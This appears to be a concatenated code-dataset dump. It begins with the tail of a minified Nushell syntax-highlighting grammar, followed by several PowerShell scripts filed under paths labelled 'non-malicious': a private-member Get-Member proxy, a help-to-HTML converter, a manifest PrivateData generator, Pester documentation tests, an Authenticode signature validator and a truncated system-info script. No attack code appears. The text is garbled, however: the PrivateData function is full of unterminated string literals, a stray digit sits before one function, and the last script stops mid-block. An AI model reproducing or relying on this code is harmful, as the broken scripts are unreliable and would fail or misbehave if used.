]+")(\\s+--\\w+)?',beginCaptures:{1:{name:"entity.name.function.nushell"},2:{name:"entity.name.type.nushell"},3:{name:"entity.name.function.nushell"}},end:"(?<=\\})",patterns:[{include:"#function-parameters"},{include:"#function-body"},{include:"#function-inout"}]},"function-body":{begin:"\\{",beginCaptures:{0:{name:"punctuation.definition.function.begin.nushell"}},end:"\\}",endCaptures:{0:{name:"punctuation.definition.function.end.nushell"}},name:"meta.function.body.nushell",patterns:[{include:"source.nushell"}]},"function-inout":{patterns:[{include:"#types"},{match:"->",name:"keyword.operator.nushell"},{include:"#function-multiple-inout"}]},"function-multiple-inout":{begin:"(?<=]\\s*)(:)\\s+(\\[)",beginCaptures:{1:{name:"punctuation.definition.in-out.nushell"},2:{name:"meta.brace.square.begin.nushell"}},end:"\\]",endCaptures:{0:{name:"meta.brace.square.end.nushell"}},patterns:[{include:"#types"},{captures:{1:{name:"punctuation.separator.nushell"}},match:"\\s*(,)\\s*"},{captures:{1:{name:"keyword.operator.nushell"}},match:"\\s+(->)\\s+"}]},"function-parameter":{patterns:[{captures:{1:{name:"keyword.control.nushell"}},match:"(-{0,2}|\\.{3})[\\w-]+(?:\\((-[\\w?])\\))?",name:"variable.parameter.nushell"},{begin:"\\??:\\s*",end:"(?=(?:\\s+(?:-{0,2}|\\.{3})[\\w-]+)|(?:\\s*(?:,|\\]|\\||@|=|#|$)))",patterns:[{include:"#types"}]},{begin:`@(?="|')`,end:`(?<="|')`,patterns:[{include:"#string"}]},{begin:"=\\s*",end:"(?=(?:\\s+-{0,2}[\\w-]+)|(?:\\s*(?:,|\\]|\\||#|$)))",name:"default.value.nushell",patterns:[{include:"#value"}]}]},"function-parameters":{begin:"\\[",beginCaptures:{0:{name:"meta.brace.square.begin.nushell"}},end:"\\]",endCaptures:{0:{name:"meta.brace.square.end.nushell"}},name:"meta.function.parameters.nushell",patterns:[{include:"#function-parameter"},{include:"#comment"}]},"internal-variables":{match:"\\$(?:nu|env)\\b",name:"variable.language.nushell"},keyword:{match:"(?:def(?:-env)?)",name:"keyword.other.nushell"},module:{begin:"((?:export\\s+)?module)\\s+([\\w\\-]+)\\s*\\{",beginCaptures:{1:{name:"entity.name.function.nushell"},2:{name:"entity.name.namespace.nushell"}},end:"\\}",endCaptures:{0:{name:"punctuation.definition.module.end.nushell"}},name:"meta.module.nushell",patterns:[{include:"source.nushell"}]},numbers:{match:"(?<![\\w-])[-+]?(?:\\d+|\\d{1,3}(?:_\\d{3})*)(?:\\.\\d*)?(?i:ns|us|ms|sec|min|hr|day|wk|b|kb|mb|gb|tb|pt|eb|zb|kib|mib|gib|tib|pit|eib|zib)?(?:(?![\\w.])|(?=\\.\\.))",name:"constant.numeric.nushell"},"numbers-hexa":{match:"(?<![\\w-])0x[0-9a-fA-F]+(?![\\w.])",name:"constant.numeric.nushell"},operators:{patterns:[{include:"#operators-word"},{include:"#operators-symbols"},{include:"#ranges"}]},"operators-symbols":{match:"(?<= )(?:(?:\\+|\\-|\\*|\\/)=?|\\/\\/|\\*\\*|!=|[<>=]=?|[!=]~|\\+\\+=?)(?= |$)",name:"keyword.control.nushell"},"operators-word":{match:"(?<= |\\()(?:mod|in|not-in|not|and|or|xor|bit-or|bit-and|bit-xor|bit-shl|bit-shr|starts-with|ends-with)(?= |\\)|$)",name:"keyword.control.nushell"},parameters:{captures:{1:{name:"keyword.control.nushell"}},match:"(?<=\\s)(-{1,2})[\\w-]+",name:"variable.parameter.nushell"},"paren-expression":{begin:"\\(",beginCaptures:{0:{name:"meta.brace.round.begin.nushell"}},end:"\\)",endCaptures:{0:{name:"meta.brace.round.end.nushell"}},name:"meta.expression.parenthesis.nushell",patterns:[{include:"#expression"}]},"pre-command":{begin:"(\\w+)(=)",beginCaptures:{1:{name:"variable.other.nushell"},2:{patterns:[{include:"#operators"}]}},end:"(?=\\s+)",patterns:[{include:"#value"}]},ranges:{match:"\\.\\.<?",name:"keyword.control.nushell"},spread:{match:"\\.\\.\\.(?=[^\\s\\]}])",name:"keyword.control.nushell"},string:{patterns:[{include:"#string-single-quote"},{include:"#string-backtick"},{include:"#string-double-quote"},{include:"#string-interpolated-double"},{include:"#string-interpolated-single"},{include:"#string-bare"}]},"string-backtick":{begin:"`",beginCaptures:{0:{name:"punctuation.definition.string.begin.nushell"}},end:"`",endCaptures:{0:{name:"punctuation.definition.string.end.nushell"}},name:"string.quoted.single.nushell"},"string-bare":{match:`[^$\\[{("',|#\\s|][^\\[\\]{}()"'\\s#,|]*`,name:"string.bare.nushell"},"string-double-quote":{begin:'"',beginCaptures:{0:{name:"punctuation.definition.string.begin.nushell"}},end:'"',endCaptures:{0:{name:"punctuation.definition.string.end.nushell"}},name:"string.quoted.double.nushell",patterns:[{match:"\\w+"},{include:"#string-escape"}]},"string-escape":{match:`\\\\(?:[bfrnt\\\\'"/]|u[0-9a-fA-F]{4})`,name:"constant.character.escape.nushell"},"string-interpolated-double":{begin:'\\$"',beginCaptures:{0:{name:"punctuation.definition.string.begin.nushell"}},end:'"',endCaptures:{0:{name:"punctuation.definition.string.end.nushell"}},name:"string.interpolated.double.nushell",patterns:[{match:"\\\\[()]",name:"constant.character.escape.nushell"},{include:"#string-escape"},{include:"#paren-expression"}]},"string-interpolated-single":{begin:"\\$'",beginCaptures:{0:{name:"punctuation.definition.string.begin.nushell"}},end:"'",endCaptures:{0:{name:"punctuation.definition.string.end.nushell"}},name:"string.interpolated.single.nushell",patterns:[{include:"#paren-expression"}]},"string-single-quote":{begin:"'",beginCaptures:{0:{name:"punctuation.definition.string.begin.nushell"}},end:"'",endCaptures:{0:{name:"punctuation.definition.string.end.nushell"}},name:"string.quoted.single.nushell"},table:{begin:"\\[",beginCaptures:{0:{name:"meta.brace.square.begin.nushell"}},end:"\\]",endCaptures:{0:{name:"meta.brace.square.end.nushell"}},name:"meta.table.nushell",patterns:[{include:"#spread"},{include:"#value"},{match:",",name:"punctuation.separator.nushell"}]},types:{patterns:[{begin:"\\b(list)\\s*<",beginCaptures:{1:{name:"entity.name.type.nushell"}},end:">",name:"meta.list.nushell",patterns:[{include:"#types"}]},{begin:"\\b(record)\\s*<",beginCaptures:{1:{name:"entity.name.type.nushell"}},end:">",name:"meta.record.nushell",patterns:[{captures:{1:{name:"variable.parameter.nushell"}},match:`([\\w\\-]+|"[\\w\\- ]+"|'[^']+')\\s*:\\s*`},{include:"#types"}]},{match:"\\b(\\w+)\\b",name:"entity.name.type.nushell"}]},"use-module":{patterns:[{captures:{1:{name:"entity.name.function.nushell"},2:{name:"entity.name.namespace.nushell"},3:{name:"keyword.other.nushell"}},match:`^\\s*((?:export )?use)\\s+([\\w\\-]+|"[\\w\\- ]+"|'[\\w\\- ]+')(?:\\s+([\\w\\-]+|"[\\w\\- ]+"|'[\\w\\- ]+'|\\*))?\\s*;?$`},{begin:`^\\s*((?:export )?use)\\s+([\\w\\-]+|"[\\w\\- ]+"|'[\\w\\- ]+')\\s*\\[`,beginCaptures:{1:{name:"entity.name.function.nushell"},2:{name:"entity.name.namespace.nushell"}},end:"(\\])\\s*;?\\s*$",endCaptures:{1:{name:"meta.brace.square.end.nushell"}},patterns:[{captures:{1:{name:"keyword.other.nushell"}},match:`([\\w\\-]+|"[\\w\\- ]+"|'[\\w\\- ]+'|\\*),?`},{include:"#comment"}]},{captures:{2:{name:"entity.name.function.nushell"},3:{name:"string.bare.nushell",patterns:[{captures:{1:{name:"entity.name.namespace.nushell"}},match:`([\\w\\- ]+)(?:\\.nu)?(?=$|"|')`}]},4:{name:"keyword.other.nushell"}},match:`(?<path>(?:/|\\\\|~[\\/\\\\]|\\.\\.?[\\/\\\\])?(?:[^\\/\\\\]+[\\/\\\\])*[\\w\\- ]+(?:\\.nu)?){0}^\\s*((?:export )?use)\\s+("\\g<path>"|'\\g<path>\\'|(?!["'])\\g<path>)(?:\\s+([\\w\\-]+|"[\\w\\- ]+"|'[^']+'|\\*))?\\s*;?$`},{begin:`(?<path>(?:/|\\\\|~[\\/\\\\]|\\.\\.?[\\/\\\\])?(?:[^\\/\\\\]+[\\/\\\\])*[\\w\\- ]+(?:\\.nu)?){0}^\\s*((?:export )?use)\\s+("\\g<path>"|'\\g<path>\\'|(?!["'])\\g<path>)\\s+\\[`,beginCaptures:{2:{name:"entity.name.function.nushell"},3:{name:"string.bare.nushell",patterns:[{captures:{1:{name:"entity.name.namespace.nushell"}},match:`([\\w\\- ]+)(?:\\.nu)?(?=$|"|')`}]}},end:"(\\])\\s*;?\\s*$",endCaptures:{1:{name:"meta.brace.square.end.nushell"}},patterns:[{captures:{0:{name:"keyword.other.nushell"}},match:`([\\w\\-]+|"[\\w\\- ]+"|'[\\w\\- ]+'|\\*),?`},{include:"#comment"}]},{captures:{0:{name:"entity.name.function.nushell"}},match:"^\\s*(?:export )?use\\b"}]},value:{patterns:[{include:"#variables"},{include:"#variable-fields"},{include:"#control-keywords"},{include:"#constant-value"},{include:"#table"},{include:"#operators"},{include:"#paren-expression"},{include:"#braced-expression"},{include:"#string"},{include:"#comment"}]},"variable-fields":{match:'(?<=\\)|\\}|\\])(?:\\.(?:[\\w-]+|"[\\w\\- ]+"))+',name:"variable.other.nushell"},variables:{captures:{1:{patterns:[{include:"#internal-variables"},{match:"\\$.+",name:"variable.other.nushell"}]},2:{name:"variable.other.nushell"}},match:'(\\$[a-zA-Z0-9_]+)((?:\\.(?:[\\w-]+|"[\\w\\- ]+"))*)'}},scopeName:"source.nushell",aliases:["nu"]});var n=[e];export{n as default};
//# sourceMappingURL=nushell.js.map
|
combined_dataset/train/non-malicious/2697.ps1
|
2697.ps1
|
function Get-Member
{
[CmdletBinding(DefaultParameterSetName = 'Default')]
Param (
[Parameter(ValueFromPipeline=$true, ParameterSetName = 'Default')]
[Parameter(ValueFromPipeline=$true, ParameterSetName = 'Private')]
[System.Management.Automation.PSObject]
$InputObject,
[Parameter(Position=0, ParameterSetName = 'Default')]
[Parameter(Position=0, ParameterSetName = 'Private')]
[ValidateNotNullOrEmpty()]
[System.String[]]
$Name,
[Parameter(ParameterSetName = 'Default')]
[Alias('Type')]
[System.Management.Automation.PSMemberTypes]
$MemberType,
[Parameter(ParameterSetName = 'Private')]
[System.Reflection.MemberTypes]
$PrivateMemberType = [System.Reflection.MemberTypes]::All,
[Parameter(ParameterSetName = 'Default')]
[System.Management.Automation.PSMemberViewTypes]
$View,
[Parameter(ParameterSetName = 'Default')]
[Parameter(ParameterSetName = 'Private')]
[Switch]
$Static,
[Parameter(ParameterSetName = 'Default')]
[Parameter(ParameterSetName = 'Private')]
[Switch]
$Force,
[Parameter(ParameterSetName = 'Private')]
[Switch]
$Private
)
BEGIN
{
try {
$outBuffer = $null
if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer))
{
$PSBoundParameters['OutBuffer'] = 1
}
$wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand('Microsoft.PowerShell.Utility\Get-Member', [System.Management.Automation.CommandTypes]::Cmdlet)
$null = $PSBoundParameters.Add('OutVariable', 'out')
if ($PSBoundParameters['Private']) {
$null = $PSBoundParameters.Remove('Private')
$Private = $True
}
if ($PSBoundParameters['PrivateMemberType']) {
$PrivateMemberType = $PSBoundParameters['PrivateMemberType']
$null = $PSBoundParameters.Remove('PrivateMemberType')
}
$scriptCmd = {& $wrappedCmd @PSBoundParameters | Out-Null }
$steppablePipeline = $scriptCmd.GetSteppablePipeline($myInvocation.CommandOrigin)
$steppablePipeline.Begin($PSCmdlet)
} catch {
}
}
PROCESS
{
try {
$steppablePipeline.Process($_)
} catch {
}
}
END
{
try {
$steppablePipeline.End()
if ($Private) {
$Object = $PSBoundParameters['InputObject']
if ($Object.GetType().FullName -ne 'System.RuntimeType') {
$Object = $Object.GetType()
}
if ($PSBoundParameters['Static']) {
$Flags = 'Static, NonPublic'
$Types = foreach ($Val in [Enum]::GetValues([System.Reflection.MemberTypes])) {
$Object.GetMembers($Flags) | Where-Object { ($_.MemberType -eq ($Val.value__ -band $PrivateMemberType)) -and ($Val -ne [System.Reflection.MemberTypes]::All) -and ($_.MemberType -ne 'Constructor') }
}
$Types += $Object.GetConstructors('Static, NonPublic, Public')
} else {
$Flags = 'Instance, NonPublic'
$Types = foreach ($Val in [Enum]::GetValues([System.Reflection.MemberTypes])) {
$Object.GetMembers($Flags) | Where-Object { ($_.MemberType -eq ($Val.value__ -band $PrivateMemberType)) -and ($Val -ne [System.Reflection.MemberTypes]::All) -and ($_.MemberType -ne 'Constructor') }
}
$Types += $Object.GetConstructors('Instance, NonPublic, Public')
}
if (!$Force) {
$Types = $Types | Where-Object { !$_.IsSpecialName }
}
$TypeTable = @{}
$Results = $Types | ForEach-Object {
$Type = $_
switch ($Type.MemberType) {
'Constructor' {
$Parameters = ($Type.GetParameters() | % {$_.ParameterType.FullName}) -join ', '
$Definition = "$(if ($Type.IsStatic){'static '})$($Type.Name)($($Parameters))"
}
'Field' {
$Definition = "$(if ($Type.IsStatic){'static '})$($Type.FieldType)"
}
'Method' {
$Parameters = ($Type.GetParameters() | % {$_.ParameterType.FullName}) -join ', '
$Definition = "$(if ($Type.IsStatic){'static '})$($Type.ReturnType) $($Type.Name)($($Parameters))"
}
'Property' {
$Definition = "$(if ($Type.IsStatic){'static '})$($Type.PropertyType) $($Type.Name) {$(if ($Type.CanRead){'get;'})$(if ($Type.CanWrite){'set;'})}"
}
'NestedType' {
$Definition = "$(if ($Type.IsStatic){'static '})$($Type.FullName) BaseType=$($Type.BaseType)"
}
'Event' {
$Parameters = ($Type.GetAddMethod().GetParameters() | % {$_.ParameterType.FullName}) -join ', '
$Definition = "$(if ($Type.IsStatic){'static '})$($Type.EventHandlerType) $($Type.Name)(System.Object, $($Parameters))"
}
}
$InternalMemberType = @{
TypeName = $Type.DeclaringType.FullName
Name = $Type.Name
MemberType = $Type.MemberType
Definition = $Definition
}
New-Object PSObject -Property $InternalMemberType
}
$Results | ForEach-Object {
$TypeTable["$($_.Name)"] += @($_)
}
$Results = foreach ($Type in $TypeTable.Keys) {
$ReturnType = @{
TypeName = $TypeTable[$Type][0].TypeName
Name = $TypeTable[$Type][0].Name
MemberType = $TypeTable[$Type][0].MemberType
Definition = ($TypeTable[$Type] | ForEach-Object { $_.Definition }) -join ', '
}
$MemberDef = New-Object PSObject -Property $ReturnType
$MemberDef.PSObject.TypeNames.Insert(0, 'Microsoft.PowerShell.Commands.MemberDefinition')
$MemberDef
}
if ($PSBoundParameters['Name']) {
$MemberNames = [String[]] $PSBoundParameters['Name']
$Tmp = New-Object PSObject[](0)
foreach ($MemberName in $MemberNames) {
$Tmp += $Results | Where-Object { $_.Name -eq $MemberName }
}
$Results = $Tmp
}
if ($Results.Count) {
$Results | Sort-Object TypeName, MemberType, Name
}
} else {
$out | Sort-Object TypeName, MemberType, Name
}
} catch {
}
}
}
|
combined_dataset/train/non-malicious/1485.ps1
|
1485.ps1
|
4
function Convert-AboutTopicToHtml
{
[CmdletBinding()]
param(
[Parameter(Mandatory=$true,ValueFromPipeline=$true)]
$InputObject,
[string]
$TopicName,
[Parameter(Mandatory=$true)]
[string]
$ModuleName,
[string]
$TopicHeading = 'TOPIC',
[string]
$ShortDescriptionHeading = 'SHORT DESCRIPTION',
[string]
$LongDescriptionHeading = 'LONG DESCRIPTION',
[string]
$SeeAlsoHeading = 'SEE ALSO',
[hashtable]
$HeadingMap = @{},
[string[]]
$Script
)
begin
{
Set-StrictMode -Version 'Latest'
}
process
{
function Complete-Section
{
param(
[string]
$Heading,
[Parameter(Mandatory=$true)]
[AllowEmptyString()]
[string]
$Body
)
$Body = $Body.Trim()
switch( $Heading )
{
$TopicHeading
{
}
$SeeAlsoHeading
{
$lines = $Body -split ([Environment]::NewLine) |
Convert-RelatedLinkToHtml -ModuleName $ModuleName -Script $Script |
ForEach-Object { '<li>{0}</li>' -f $_ }
$Body = @'
<ul>
{0}
</ul>
'@ -f ($lines -join [Environment]::NewLine)
}
default
{
$Body = $Body | Edit-HelpText -ModuleName $ModuleName | Convert-MarkdownToHtml
}
}
$topic | Add-Member -Name $Heading -MemberType NoteProperty -Value $Body
}
if( $InputObject -is [IO.FileInfo] )
{
[string[]]$lines = $InputObject | Get-Content
$TopicName = $InputObject.BaseName -replace '\.help$' -f ''
}
elseif( $InputObject -is [string] -and $InputObject -match '^about_' )
{
[string[]]$lines = Get-Help -Name $InputObject
if( -not $lines )
{
Write-Error ('About topic ''{0}'' not found.' -f $InputObject)
return
}
$TopicName = $InputObject
}
else
{
$lines = $InputObject -split ([Environment]::NewLine)
}
$topic = [pscustomobject]@{ }
$currentHeader = $null
$currentContent = $null
$sectionOrder = New-Object 'Collections.Generic.List[string]'
$lastLineIdx = $lines.Count - 1
for( $idx = 0; $idx -lt $lines.Count; ++$idx )
{
$line = $lines[$idx]
if( -not $line -or $line -match '^\s+' )
{
if( $line.StartsWith(' ') )
{
$line = $line -replace '^ ',''
}
elseif( $line.StartsWith(' ') )
{
$line = $line -replace '^ ',''
}
[void]$currentContent.AppendLine( $line )
if( $idx -eq $lastLineIdx )
{
Complete-Section -Heading $currentHeader -Body $currentContent.ToString()
}
continue
}
else
{
if( $currentHeader )
{
Complete-Section -Heading $currentHeader -Body $currentContent.ToString()
}
$currentContent = New-Object 'Text.StringBuilder'
$currentHeader = [Globalization.CultureInfo]::CurrentCulture.TextInfo.ToTitleCase( $line.ToLowerInvariant() )
$sectionOrder.Add( $currentHeader )
}
}
if( -not ($topic | Get-Member -Name $TopicHeading) )
{
Write-Warning ('Topic ''{0}'' doesn''t have a ''{1}'' heading. Defaulting to {0}. Use the `TopicHeading` parameter to set the topic''s topic heading.' -f $TopicName,$TopicHeading)
Complete-Section -Heading 'TOPIC' -Body $TopicName
}
if( -not ($topic | Get-Member -Name $ShortDescriptionHeading) )
{
Write-Warning ('Topic ''{0}'' doesn''t have a ''{1}'' heading. Use the `ShortDescription` parameter to set the topic''s SHORT DESCRIPTION heading.' -f $TopicName,$ShortDescriptionHeading)
Complete-Section -Heading 'SHORT DESCRIPTION' -Body ''
}
if( -not $HeadingMap.ContainsKey($LongDescriptionHeading) )
{
$HeadingMap[$LongDescriptionHeading] = 'Description'
}
$content = New-Object 'Text.StringBuilder'
foreach( $section in $sectionOrder )
{
if( $section -eq $TopicHeading -or $section -eq $ShortDescriptionHeading )
{
continue
}
$heading = $section
if( $HeadingMap.ContainsKey($section) )
{
$heading = $HeadingMap[$section]
}
[void]$content.AppendLine( ('<h2>{0}</h2>' -f $heading) )
[void]$content.AppendLine( $topic.$Section )
}
@'
<h1>{0}</h1>
{1}
{2}
'@ -f $topic.$TopicHeading,$topic.$ShortDescriptionHeading,$content
}
end
{
}
}
|
combined_dataset/train/non-malicious/4372.ps1
|
4372.ps1
|
function Get-PrivateData
{
param
(
[System.Collections.Hashtable]
$PrivateData
)
if($PrivateData.Keys.Count -eq 0)
{
$content = "
PSData = @{
}
}
return $content
}
$Tags= $PrivateData["Tags"] -join "','" | Foreach-Object {"'$_'"}
$LicenseUri = $PrivateData["LicenseUri"]| Foreach-Object {"'$_'"}
$ProjectUri = $PrivateData["ProjectUri"] | Foreach-Object {"'$_'"}
$IconUri = $PrivateData["IconUri"] | Foreach-Object {"'$_'"}
$ReleaseNotesEscape = $PrivateData["ReleaseNotes"] -Replace "'","''"
$ReleaseNotes = $ReleaseNotesEscape | Foreach-Object {"'$_'"}
$Prerelease = $PrivateData[$script:Prerelease] | Foreach-Object {"'$_'"}
$RequireLicenseAcceptance = $PrivateData["RequireLicenseAcceptance"]
$ExternalModuleDependencies = $PrivateData["ExternalModuleDependencies"] -join "','" | Foreach-Object {"'$_'"}
$DefaultProperties = @("Tags","LicenseUri","ProjectUri","IconUri","ReleaseNotes",$script:Prerelease,"ExternalModuleDependencies","RequireLicenseAcceptance")
$ExtraProperties = @()
foreach($key in $PrivateData.Keys)
{
if($DefaultProperties -notcontains $key)
{
$PropertyString = "
$PropertyString += "`r`n "
if(($PrivateData[$key]).GetType().IsArray)
{
$PropertyString += $key +" = " +" @("
$PrivateData[$key] | Foreach-Object { $PropertyString += "'" + $_ +"'" + "," }
if($PrivateData[$key].Length -ge 1)
{
$PropertyString = $PropertyString -Replace ".$"
}
$PropertyString += ")"
}
else
{
$PropertyString += $key +" = " + "'"+$PrivateData[$key]+"'"
}
$ExtraProperties += ,$PropertyString
}
}
$ExtraPropertiesString = ""
$firstProperty = $true
foreach($property in $ExtraProperties)
{
if($firstProperty)
{
$firstProperty = $false
}
else
{
$ExtraPropertiesString += "`r`n`r`n "
}
$ExtraPropertiesString += $Property
}
$TagsLine ="
if($Tags -ne "''")
{
$TagsLine = "Tags = "+$Tags
}
$LicenseUriLine = "
if($LicenseUri -ne "''")
{
$LicenseUriLine = "LicenseUri = "+$LicenseUri
}
$ProjectUriLine = "
if($ProjectUri -ne "''")
{
$ProjectUriLine = "ProjectUri = " +$ProjectUri
}
$IconUriLine = "
if($IconUri -ne "''")
{
$IconUriLine = "IconUri = " +$IconUri
}
$ReleaseNotesLine = "
if($ReleaseNotes -ne "''")
{
$ReleaseNotesLine = "ReleaseNotes = "+$ReleaseNotes
}
$PrereleaseLine = "
if ($Prerelease -ne "''")
{
$PrereleaseLine = "Prerelease = " +$Prerelease
}
$RequireLicenseAcceptanceLine = "
if($RequireLicenseAcceptance)
{
$RequireLicenseAcceptanceLine = "RequireLicenseAcceptance = `$true"
}
$ExternalModuleDependenciesLine ="
if($ExternalModuleDependencies -ne "''")
{
$ExternalModuleDependenciesLine = "ExternalModuleDependencies = @($ExternalModuleDependencies)"
}
if(-not $ExtraPropertiesString -eq "")
{
$Content = "
ExtraProperties
PSData = @{
$TagsLine
$LicenseUriLine
$ProjectUriLine
$IconUriLine
$ReleaseNotesLine
$PrereleaseLine
$RequireLicenseAcceptanceLine
$ExternalModuleDependenciesLine
}
}
$Content -replace "ExtraProperties", $ExtraPropertiesString
}
else
{
$content = "
PSData = @{
$TagsLine
$LicenseUriLine
$ProjectUriLine
$IconUriLine
$ReleaseNotesLine
$PrereleaseLine
$RequireLicenseAcceptanceLine
$ExternalModuleDependenciesLine
}
}
return $content
}
}
|
combined_dataset/train/non-malicious/1190.ps1
|
1190.ps1
|
Set-StrictMode -Version 'Latest'
& (Join-Path -Path $PSScriptRoot -ChildPath 'Initialize-CarbonTest.ps1' -Resolve)
function Assert-NoDocumentationMissing
{
param(
[string[]]
$CommandName
)
Set-StrictMode -Version 'Latest'
$CommandName | Should -BeNullOrEmpty -Because ("The following commands are missing all or part of their documentation:`n`t{0}" -f ($CommandName -join "`n`t"))
}
filter Where-HelpIncomplete
{
param(
[Parameter(ValueFromPipeline=$true)]
[Management.Automation.CommandInfo]
$Command
)
Set-StrictMode -Version 'Latest'
$_ |
Where-Object {
$help = $_ | Get-Help
if( $help -is [String] )
{
return $true
}
if( -not (($help | Get-Member 'synopsis') -and ($help | Get-Member 'description') -and ($help | Get-Member 'examples')) )
{
return $true
}
return -not ($help.synopsis -and $help.description -and $help.examples)
}
}
Describe 'Documentation' {
It 'all functions should have documentation' {
$commandsMissingDocumentation = Get-Command -Module Carbon |
Where-HelpIncomplete |
Select-Object -ExpandProperty Name |
Sort-Object
Assert-NoDocumentationMissing $commandsMissingDocumentation
}
It 'all dsc resources should have documentation' {
$dscRoot = Join-Path -Path $PSScriptRoot -ChildPath '..\Carbon\DscResources' -Resolve
$resourcesMissingDocs = @()
foreach( $resourceRoot in (Get-ChildItem -Path $dscRoot -Directory -Filter 'Carbon_*') )
{
Import-Module -Name $resourceRoot.FullName
$moduleName = $resourceRoot.Name
try
{
$resourcesMissingDocs += Get-Command -Name 'Set-TargetResource' -Module $moduleName |
Where-HelpIncomplete |
Select-Object -ExpandProperty Module |
Select-Object -ExpandProperty Name |
Sort-Object
}
finally
{
Remove-Module $moduleName
}
}
Assert-NoDocumentationMissing $resourcesMissingDocs
}
}
|
combined_dataset/train/non-malicious/4319.ps1
|
4319.ps1
|
function ValidateAndGet-AuthenticodeSignature
{
[CmdletBinding()]
Param
(
[Parameter(Mandatory=$true)]
[PSModuleInfo]
$ModuleInfo
)
$ModuleDetails = $null
$AuthenticodeSignature = $null
$ModuleName = $ModuleInfo.Name
$ModuleBasePath = $ModuleInfo.ModuleBase
$ModuleManifestName = "$ModuleName.psd1"
$CatalogFileName = "$ModuleName.cat"
$CatalogFilePath = Microsoft.PowerShell.Management\Join-Path -Path $ModuleBasePath -ChildPath $CatalogFileName
if(Microsoft.PowerShell.Management\Test-Path -Path $CatalogFilePath -PathType Leaf)
{
$message = $LocalizedData.CatalogFileFound -f ($CatalogFileName, $ModuleName)
Write-Verbose -Message $message
$AuthenticodeSignature = Microsoft.PowerShell.Security\Get-AuthenticodeSignature -FilePath $CatalogFilePath
if(-not $AuthenticodeSignature -or ($AuthenticodeSignature.Status -ne "Valid"))
{
$message = $LocalizedData.InvalidModuleAuthenticodeSignature -f ($ModuleName, $CatalogFileName)
ThrowError -ExceptionName 'System.InvalidOperationException' `
-ExceptionMessage $message `
-ErrorId 'InvalidAuthenticodeSignature' `
-CallerPSCmdlet $PSCmdlet `
-ErrorCategory InvalidOperation
return
}
Write-Verbose -Message ($LocalizedData.ValidAuthenticodeSignature -f @($CatalogFileName, $ModuleName))
if(Get-Command -Name Test-FileCatalog -Module Microsoft.PowerShell.Security -ErrorAction Ignore)
{
Write-Verbose -Message ($LocalizedData.ValidatingCatalogSignature -f @($ModuleName, $CatalogFileName))
$TestFileCatalogResult = Microsoft.PowerShell.Security\Test-FileCatalog -Path $ModuleBasePath `
-CatalogFilePath $CatalogFilePath `
-FilesToSkip $script:PSGetItemInfoFileName,'*.cat','*.nupkg','*.nuspec' `
-Detailed `
-ErrorAction SilentlyContinue
if(-not $TestFileCatalogResult -or
($TestFileCatalogResult.Status -ne "Valid") -or
($TestFileCatalogResult.Signature.Status -ne "Valid"))
{
$message = $LocalizedData.InvalidCatalogSignature -f ($ModuleName, $CatalogFileName)
ThrowError -ExceptionName 'System.InvalidOperationException' `
-ExceptionMessage $message `
-ErrorId 'InvalidCatalogSignature' `
-CallerPSCmdlet $PSCmdlet `
-ErrorCategory InvalidOperation
return
}
else
{
Write-Verbose -Message ($LocalizedData.ValidCatalogSignature -f @($CatalogFileName, $ModuleName))
}
}
}
else
{
Write-Verbose -Message ($LocalizedData.CatalogFileNotFoundInNewModule -f ($CatalogFileName, $ModuleName))
$message = "Using the '{0}' file for getting the authenticode signature." -f ($ModuleManifestName)
Write-Debug -Message $message
$AuthenticodeSignature = Microsoft.PowerShell.Security\Get-AuthenticodeSignature -FilePath $ModuleInfo.Path
if($AuthenticodeSignature)
{
if($AuthenticodeSignature.Status -eq "Valid")
{
Write-Verbose -Message ($LocalizedData.ValidAuthenticodeSignatureInFile -f @($ModuleManifestName, $ModuleName))
}
elseif($AuthenticodeSignature.Status -ne "NotSigned")
{
$message = $LocalizedData.InvalidModuleAuthenticodeSignature -f ($ModuleName, $ModuleManifestName)
ThrowError -ExceptionName 'System.InvalidOperationException' `
-ExceptionMessage $message `
-ErrorId 'InvalidAuthenticodeSignature' `
-CallerPSCmdlet $PSCmdlet `
-ErrorCategory InvalidOperation
return
}
}
}
if($AuthenticodeSignature)
{
$ModuleDetails = @{}
$ModuleDetails['AuthenticodeSignature'] = $AuthenticodeSignature
$ModuleDetails['Version'] = $ModuleInfo.Version
$ModuleDetails['ModuleBase']=$ModuleInfo.ModuleBase
$ModuleDetails['IsMicrosoftCertificate'] = Test-MicrosoftCertificate -AuthenticodeSignature $AuthenticodeSignature
$PublisherDetails = Get-AuthenticodePublisher -AuthenticodeSignature $AuthenticodeSignature
$ModuleDetails['Publisher'] = if($PublisherDetails) {$PublisherDetails.Publisher}
$ModuleDetails['RootCertificateAuthority'] = if($PublisherDetails) {$PublisherDetails.PublisherRootCA}
$message = $LocalizedData.NewModuleVersionDetailsForPublisherValidation -f ($ModuleInfo.Name, $ModuleInfo.Version, $ModuleDetails.Publisher, $ModuleDetails.RootCertificateAuthority, $ModuleDetails.IsMicrosoftCertificate)
Write-Debug $message
}
return $ModuleDetails
}
|
combined_dataset/train/non-malicious/sample_1_55.ps1
|
sample_1_55.ps1
|
##**************************************************************************
#********************* AUTO GENERAGED - DO NOT MODIFY **********************
# This file is the source code for discoverset OperatingSystemCore
# Version 4.07
# Date: 10/20/2014
#***************************************************************************
########################## Non-Editable REGION ###########################
###Start Entity Function (EntityID=5a129654-cefb-4195-849c-6b0afb48e198)
Function FN_Class_BasicSysInfo()
{
$OSWMI = Get-CimInstance -Class Win32_OperatingSystem
$CSWMI = Get-CimInstance -Class Win32_ComputerSystem
$ReturnObjectMember = @{}
#Properties
$ReturnObjectMember += @{'OSVersion' = [Environment]::OSVersion.Version.ToString()}
$ReturnObjectMember += @{'MachineName' = [Environment]::MachineName}
$ReturnObjectMember += @{'OSName' = $OSWMI.Caption}
$ReturnObjectMember += @{'ServerSKU' = ($OSWMI.ProductType -ne 1)}
$ReturnObjectMember += @{'DomainController' = ($OSWMI.ProductType -eq 2)}
$ReturnObjectMember += @{'VisibleMemory' = $OSWMI.TotalVisibleMemorySize}
$ReturnObjectMember += @{'OSServicePack' = $OSWMI.ServicePackMajorVersion}
$ReturnObjectMember += @{'Manufacturer' = $CSWMI.Manufacturer}
$ReturnObjectMember += @{'SystemModel' = $CSWMI.Model}
$OSVersion = [Environment]::OSVersion.Version
$ReturnObjectMember += @{'OSBuild' = $OSVersion.Build}
$ReturnObjectMember += @{'OSRevision' = $OSVersion.Revision}
$ReturnObjectMember += @{'OSMajor' = $OSVersion.Major}
$ReturnObjectMember += @{'OSMinor' = $OSVersion.Minor}
if (($Env:PROCESSOR_ARCHITEW6432).Length -gt 0) #running in WOW
{
